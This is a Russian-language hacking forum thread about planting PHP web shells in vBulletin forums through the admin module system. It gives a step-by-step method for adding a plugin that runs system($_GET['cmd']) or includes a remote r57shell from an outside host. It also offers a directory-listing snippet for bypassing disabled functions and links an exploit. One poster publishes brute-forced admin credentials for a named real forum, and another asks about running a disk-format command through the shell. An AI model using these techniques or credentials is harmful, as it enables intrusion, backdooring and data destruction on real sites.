Ни самописный шелл, ни вообще любой другой через модули (как написано в теме про уязвимости vBulletin) не работает. заходишь на faq.php?cmd=ls например, а там фигня полная. поиск и всё. через смайлы тоже не канает. :confused:

отсюда вывод, оно пропатчено.....

вот бл!!!! нах спрашивается я столько брутил??? :))

дело не в патче,а в неправильном использовании скрипта... если ты в модуль зафигачил шел,то он будет работать 100% (при условии что ты правльно даешь команду) в версии 3.5.4

может там винда стоит попробуй faq.php?cmd=dir

не, там фряха! =)
а использую правильно, че вы думаете я шелл не могу заюзать?? =)
я ещё помню времена php-including =)

лабо пропачено, либо ты что то не так сделал. еще раз все проверь.

один раз было такое, что вот так не сработало faq.php?cmd=ls -al

пришлось прямо в модуль вставлять код, попробуй. но при выполнении следующей команды надо переписывать модуль. ТАк что сразу заливай шелл.

и так тоже не канает!

Дай каму-нить линку пусть попытается кто-нить!!!

P.s.Кто же ентот счасливчик?:)

неее :) я сам хочу :)
как думаете если к вложениям добавить пхп, а потом куда-нить вложить шелл будет работать?? :)

топикстатрет а ты вобще подумал о том что там может стоять сейфмод или в дисабле_функ зафигачено все ехечные функции?

посмотри phpinfo();

если отключены функции выполнении команд, то юзай php

Например вывод всех файлов в каталоге:

<?
$dir=dir("./");
print "Pwd:".realpath($dir->path)."<br>\n";
while(False!==($entry=$dir->read())) {
if(is_dir(realpath($dir->path).'/'.$entry)) {
echo " d[".$entry."]".(is_writable(realpath($dir->path).'/'.$entry)?'[W]':'')."<br>\n";
} else {
echo $entry.(is_writable(realpath($dir->path).'/'.$entry)?'[W]':'')."<br>\n";
}
}
$dir->close();
?>

попробуй вместо <? system($_GET['cmd']) ?> вбить <? include($_GET['inc']) ?> и проинклудь нормальный шелл... faq.php?inc=http://site.ru/shell.php, где http://site.ru/shell.php - ссылка на твой шелл

к сожелению вообще ничего не канает :'(

safe_mod = off

disable_functions system, shell_exec, exec, proc_get_status, proc_nice, proc_terminate, define_syslog_variables, syslog, openlog, closelog, escapeshellcmd, passthru, readfile, ocinumcols, ini_alter, leak, listen, chgrp, set_time_limit, apache_note, apache_setenv, debugger_on, debugger_off, ftp_exec, dl, dll, ftp

что блин делать?) вам на растерзание отдать??:))

<? echo "31337"; ?>
даже это не канает!!

Давай на растерзанье лутше...

неее, что то тут не чисто!!:) надо разобраться!!:)

Все тут чисто. Не парься, голяк тут полный. Но может можно по - другому обойти=)

не догнал. обьясни почему голяк-то!
я вот всё думаю почему модули-то включены.
а даже самый простой код не обрабатывается :'(

ладно!! фиг с вами!!) всё равно я не надеялся что там есть шестизнаки =)
жуйте!
http://6uin.info/forum/admincp/
Ponka:xfhkbr

репу хоть повысьте =)

Можно поставить плюсик за то что "так много брутил" но лутше убери Log : pass к админке, вроде бы на форуме запрещено выкладывать шеллы , а тебе еще и минусов накидают :) .

да не, там с шеллом пустое дело! там все функции запрещены, которыми можно команды выполнять...

Защел я сегодня на этот форум, увидил много новых админов :)

Сейчас на этом форуме написано:

"Вы лолы =)"

Удивительно.
А может кто-нибудь мне помочь со взломом vBulletin 3.6.4 ?
Конкретно нужен пасс от админки, другое не нужно...

Validol
я написал =)

для булета я где то читал можно через шаблоны хмл заливать, сам шас ищу этот пост, если кто найдет киньте линк в ЛС

http://video.antichat.ru/file221.html
Тут всё показано)

у меня админка старая, а форум 3.5.4, поэтому через смайлы никак, а модуля вообще нетБтак что твой способ мне не поможет, но я точно помню кто то писал тут, что можно через шаблоны заливать и даже точно говорил как, перечитал 13 страниц поиска ничего не нашел...

у меня админка старая, а форум 3.5.4, поэтому через смайлы никак, а модуля вообще нетБтак что твой способ мне не поможет, но я точно помню кто то писал тут, что можно через шаблоны заливать и даже точно говорил как, перечитал 13 страниц поиска ничего не нашел...
Система модулей -> Управление модулями -> [Добавить новый модуль] -> Далее выбираешь Местоположение хака -> faq_complete. Заголовок пишешь любой к примеру 123
Код PHP модуля пишешь include "http://http://hcr.3dn.ru/expl/php/r57shell.txt";
Сохраняешь.И заходишь в FAQ и будет те счастье.
Да и незабудь выбрать модуль включен -> Да

А как подлить шелл в вобле 3.6.3?

Можно что нибудь зделать имея доступ супер модератора?

Можно что нибудь зделать имея доступ супер модератора?

http://milw0rm.com/exploits/3387 - vBulletin <= 3.6.4

...что можно через шаблоны заливать ...
вот c воблы 3.6.3 кусок с щаблончика(кто на форуме):
<a href="forumdisplay.php?$session[sessionurl]do=markread" rel="nofollow">$vbphrase[mark_forums_read]</a>-
менюшка: Навигация->Все разделы прочитаны

href="forumdisplay.php?$session[sessionurl]do=markread
- попробывал из админ панели изминить на :
http://www.myshell.ru/shell.php?cmd=id
но походу админ запретил изменения файлов форума,
мне не удалось поменять в шаблоне ни одного символа-
You don't have permission to access/somescript.php.Хотя я знаю что админ менял этот скрипт и другие(копирайты вобловcкие убрал:) ).

Cпасибо конечно, но я же писал, что админка от 3.0.1 там нету вообще возможности добавлять модуль!

2AkyHa_MaTaTa
Я точно помню, я на ачате читал, что можно, надо будет самому потом разобраться

а нормально сработает такая конструкуия forumpath/faq.php?cmd=format d: /Q
с учетом того что шел нормально залился и forumpath/faq.php?cmd=dir показывает содержимое.
спасибо.